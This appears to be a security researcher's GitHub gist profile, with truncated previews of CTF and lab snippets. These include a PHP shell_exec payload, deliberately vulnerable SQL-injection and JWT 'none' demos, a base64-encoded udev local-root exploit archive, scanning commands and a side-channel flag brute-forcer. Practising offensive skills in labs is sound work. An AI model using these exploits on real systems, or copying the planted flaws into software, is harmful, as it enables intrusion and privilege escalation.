Skip to content

Instantly share code, notes, and snippets.

View grittyninja's full-sized avatar
🤸

Herdian N grittyninja

🤸
18 followers · 3 following
  • Indonesia
View GitHub Profile
@grittyninja
grittyninja / test.php
Last active August 28, 2024 09:40
<?php
shell_exec('calc.exe');
?>
@grittyninja
grittyninja / sql injection postgres.py
Created August 27, 2024 13:23
# app.py
from flask import Flask, request, jsonify
import psycopg2
from psycopg2.extras import RealDictCursor
import os
app = Flask(__name__)
# Database connection
def get_db_connection():
@grittyninja
grittyninja / demo jwt
Created August 27, 2024 05:56
<?php
// JWT implementation with SQLite in PHP supporting RS256, HS256, and none
// Initialize SQLite database
$db = new SQLite3('users.db');
// Create users table if not exists
$db->exec('CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE,
@grittyninja
grittyninja / udev.tar.gz.b64
Created December 11, 2018 06:19
udev local root exploit https://www.exploit-db.com/exploits/8478
H4sIAFFBD1wAA+1dDXRUVX6/b2aAIMOQhCggqKMGARcmEwghiOgEEj7WAAFClCPwmMxMMoOTmex8sEE5XXBgNcacpkp3OafsqS3ursejXbZuPVrdFg0S7Mce1q7dbcu27FntGdrsEUvWpRKZ/v/3vjvvzs0kJBpYrfeX8899/3f/7369j3lv3v39JtDeVkauMtyAJYsXY1q+ZLFbTDlI+aIK96LKCvdiWHaXuxeVLybOxVe7YYhkPOGNOZ0kGPNHhou7Uv4XFAHY/+FQUySqB9pd8air3OUe8zqG3/+LFrkr5f2/cEllOXGOfUvy4Eu+/79RW7dK07Ssb4U/9OoLCamAtGoRW19BnGQimUumkmKiSWU8aWFmQwe204yU2xuE2Tgx32naWcJM3P4BuCo9cC+zE4TZeCPfIuU/R5iNN8pAa9BMKyXMeF79+wn/GqiXm5y/EfLzjdV4o0ubID9f/bitZqQldCwJWb1+C6m57cyzry8/+/NMr7126313HXq//wmfxRgPjY+Lk2jjjHpe7frQIdd9vbBcDDZB8m+WfIfk833aSv2JhOihSChB4oFES8iPSRKSZAQWApHdcFUI+MIErgs+vCZUkpwrBFldt3bFSn0hvVJYjD+N1qHRcSw06i0MhSZjxN2Gb/dAuyGwEFMYgBJMYZCmY2rLN+IKCgoKCgoKCgoKCgoKY4XMS/jglTlawP2jdvgfxMVzZzOAo/g0F8Tsc6epj0+2QVx57jj1p6OP/84dA3dLx/ubU322tBdW7O95Fp6SU332XST9I8hLnShkTm/W6UoRqKU+fVDI7krZcV1X6i6WLGeJhwbupYHO7s7tA2/3dM4q7bn2Q6agoKCgoKCgoKCgoKCg8IVDXY1ev6m2bkN1DSG+YPTrEWcsGk3chf+cZYnWtrJ4MuRf5vQFW6N+51fi5jqywEfiQVLWFIqUQarNtC5zEvbO+5UPMpkEpAXnMxl895uEdCdh78QR2sObiLa3QJtpt9ke19g0gFlgJ2A7fD9Nqh0F
@grittyninja
grittyninja / scan.cs
Created August 27, 2018 10:39
Scanning Cheatsheet
# masscan
./masscan -e tun0 --rate=300 -p0-65535 10.10.10.91
# nmap
nmap -sC -T4 -A target
@grittyninja
grittyninja / USEFUL COMMAND
Created July 22, 2017 18:35
# remove html tag
sed -e 's/<[^>]*>//g' foo.html
@grittyninja
grittyninja / pwnbox Dockerfile
Last active June 24, 2017 17:02
# install https://github.com/Lokaltog/powerline-fonts
# save as 'Dockerfile'
# run docker without sudo, run 'sudo gpasswd -a $USER docker'
# docker build -t pwnbox .
FROM gliderlabs/alpine:3.4
# update packages
RUN apk update
@grittyninja
grittyninja / gist:b698e85733b379bc78f5ea6b0362caa2
Created May 22, 2017 11:22
Clean Format
%s/h\n\?mov\s\+\[[a-z]\{3}+[a-zA-Z0-9_]\+\],\s/, 0x/e | %s/h//e | %s/mov\s\+\[[a-z]\{3}+[a-zA-Z0-9_]\+\],\s/0x/e
@grittyninja
grittyninja / fmtstr_patch.py
Created October 30, 2016 12:16
'''
Author : Cyber Security IPB
Date : October 28, 2016
Dependencies : pwntools
Script ini bisa mengganti pemanggilan fungsi dari suatu binary ELF
(32 / 64 bit). Misalnya mengubah dari "call printf" menjadi call "puts"
untuk menambal celah format string exploit. Atau mengubah pemanggilan
fungsi yang ada di program menjadi fungsi lain.
@grittyninja
grittyninja / gist:4608b40dc8c91740494db6a28c53c1cc
Created September 26, 2016 07:02
pintools - count
#!/usr/bin/env python2
import os
import string
import operator
import commands
charset = "_{}" + string.ascii_letters + string.digits
offset = 24 # true condition - false condition
tmp = ""
cm = ""
def main():